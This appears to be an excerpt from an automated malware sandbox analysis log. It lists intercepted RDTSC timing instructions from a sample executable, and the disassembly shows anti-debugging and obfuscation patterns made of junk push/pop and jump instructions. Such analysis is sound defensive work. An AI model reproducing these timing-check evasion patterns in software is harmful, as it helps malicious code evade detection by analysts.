Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2F40 second address: CA2F46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA22A3 second address: CA22B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FD13D063716h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA22B0 second address: CA22B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA22B5 second address: CA22BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA23FD second address: CA2407 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD13CB4AEF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2407 second address: CA240D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2586 second address: CA25A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AF08h 0x00000009 je 00007FD13CB4AEF6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA25A8 second address: CA25BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FD13D063722h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA25BA second address: CA25D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD13CB4AEF6h 0x0000000a jmp 00007FD13CB4AF00h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2737 second address: CA273C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA273C second address: CA2742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2742 second address: CA2761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007FD13D06371Dh 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2761 second address: CA2765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2765 second address: CA2773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FD13D063716h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA28AC second address: CA28B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA28B2 second address: CA28D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD13D063716h 0x0000000a jmp 00007FD13D06371Eh 0x0000000f popad 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop esi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA28D8 second address: CA28F0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD13CB4AEF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FD13CB4AEFEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA2D74 second address: CA2D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C765B5 second address: C765E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jbe 00007FD13CB4AEFCh 0x00000010 jg 00007FD13CB4AEF6h 0x00000016 lea eax, dword ptr [ebp+12B68362h] 0x0000001c clc 0x0000001d nop 0x0000001e jnc 00007FD13CB4AEFEh 0x00000024 push eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C765E7 second address: C765EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C765EB second address: C765F9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD13CB4AEF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C765F9 second address: C765FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C765FD second address: C5DE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+129C2675h], edi 0x0000000e call dword ptr [ebp+129C2644h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007FD13CB4AEF6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76A13 second address: C76A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C29 second address: C76C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C2D second address: C76C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C33 second address: C76C67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 jmp 00007FD13CB4AF05h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C67 second address: C76C82 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD13D063718h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b movzx edi, cx 0x0000000e push 237F6748h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C82 second address: C76C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76C86 second address: C76C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76F22 second address: C76F30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76F30 second address: C76F36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C76F36 second address: C76F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7713D second address: C77147 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD13D06371Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7783E second address: C77857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FD13CB4AEF6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C77857 second address: C7785D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C7785D second address: C77864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C77864 second address: C7789F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FD13D063718h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 adc di, 3670h 0x00000027 lea eax, dword ptr [ebp+12B683A6h] 0x0000002d mov ecx, 7EE3D4FFh 0x00000032 push eax 0x00000033 pushad 0x00000034 push ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C5E971 second address: C5E99C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD13CB4AEF6h 0x00000008 je 00007FD13CB4AEF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007FD13CB4AF06h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C5E99C second address: C5E9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: C5E9A2 second address: C5E9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FD13CB4AEF6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9526 second address: CA953D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 jbe 00007FD13D063716h 0x0000000d jng 00007FD13D063716h 0x00000013 pop edx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA953D second address: CA9547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA97B8 second address: CA97E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jl 00007FD13D063716h 0x00000010 jmp 00007FD13D063723h 0x00000015 popad 0x00000016 jng 00007FD13D06371Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA97E4 second address: CA9827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 ja 00007FD13CB4AEF6h 0x0000000e je 00007FD13CB4AEF6h 0x00000014 jmp 00007FD13CB4AF00h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d jmp 00007FD13CB4AF09h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9827 second address: CA982C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA982C second address: CA983C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD13CB4AEF8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA983C second address: CA9840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA99E0 second address: CA99E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9F72 second address: CA9F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9F78 second address: CA9F8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FD13CB4AEF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FD13CB4AEF6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9F8E second address: CA9F98 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD13D063716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CA9F98 second address: CA9FB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF09h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAFA7E second address: CAFA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAFA82 second address: CAFAA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD13CB4AF09h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAE7C6 second address: CAE7F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063728h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FD13D06371Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAE4D6 second address: CAE4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAE4DA second address: CAE4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD13D063722h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAF1E0 second address: CAF209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007FD13CB4AEF6h 0x00000012 jmp 00007FD13CB4AF02h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CAF209 second address: CAF20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB4DBF second address: CB4DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB4DC5 second address: CB4DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB4DC9 second address: CB4DCF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB522A second address: CB522E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB522E second address: CB5257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD13CB4AF05h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FD13CB4AEFEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB5257 second address: CB5276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063729h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB53C0 second address: CB53D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD13CB4AF00h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB53D6 second address: CB53E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD13D06371Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB59CC second address: CB59D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB5DF8 second address: CB5DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB5DFE second address: CB5E20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FD13CB4AF00h 0x00000010 popad 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB5E20 second address: CB5E3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063722h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: CB9079 second address: CB907D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71400F2 second address: 71400F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71400F6 second address: 71400FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71400FC second address: 714016E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 push ecx 0x00000015 jmp 00007FD13D063720h 0x0000001a mov dword ptr [esp], esi 0x0000001d pushad 0x0000001e mov di, cx 0x00000021 mov cx, 8909h 0x00000025 popad 0x00000026 mov esi, dword ptr [74E806ECh] 0x0000002c jmp 00007FD13D063724h 0x00000031 test esi, esi 0x00000033 pushad 0x00000034 call 00007FD13D06371Eh 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714016E second address: 7140186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 call 00007FD13CB4AF01h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140186 second address: 71401BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 jne 00007FD13D064639h 0x0000000c jmp 00007FD13D06371Dh 0x00000011 xchg eax, edi 0x00000012 jmp 00007FD13D06371Eh 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD13D06371Eh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71401BF second address: 71401D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AEFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71401D1 second address: 71401D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71402A1 second address: 71402A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71402A5 second address: 71402BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140361 second address: 714037C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714037C second address: 7140382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714049B second address: 7140523 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13CB4AF07h 0x00000009 jmp 00007FD13CB4AF03h 0x0000000e popfd 0x0000000f call 00007FD13CB4AF08h 0x00000014 pop ecx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebx+4Ch] 0x0000001b pushad 0x0000001c mov ecx, 5349EB79h 0x00000021 popad 0x00000022 mov dword ptr [esi+10h], eax 0x00000025 jmp 00007FD13CB4AF04h 0x0000002a mov eax, dword ptr [ebx+50h] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FD13CB4AF07h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140523 second address: 7140529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7140529 second address: 714052D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714052D second address: 7140615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b jmp 00007FD13D063727h 0x00000010 mov eax, dword ptr [ebx+54h] 0x00000013 pushad 0x00000014 mov si, 01EBh 0x00000018 pushfd 0x00000019 jmp 00007FD13D063720h 0x0000001e add ah, 00000078h 0x00000021 jmp 00007FD13D06371Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esi+18h], eax 0x0000002b jmp 00007FD13D063726h 0x00000030 mov eax, dword ptr [ebx+58h] 0x00000033 jmp 00007FD13D063720h 0x00000038 mov dword ptr [esi+1Ch], eax 0x0000003b pushad 0x0000003c mov ebx, esi 0x0000003e push eax 0x0000003f pushfd 0x00000040 jmp 00007FD13D063729h 0x00000045 add eax, 48771326h 0x0000004b jmp 00007FD13D063721h 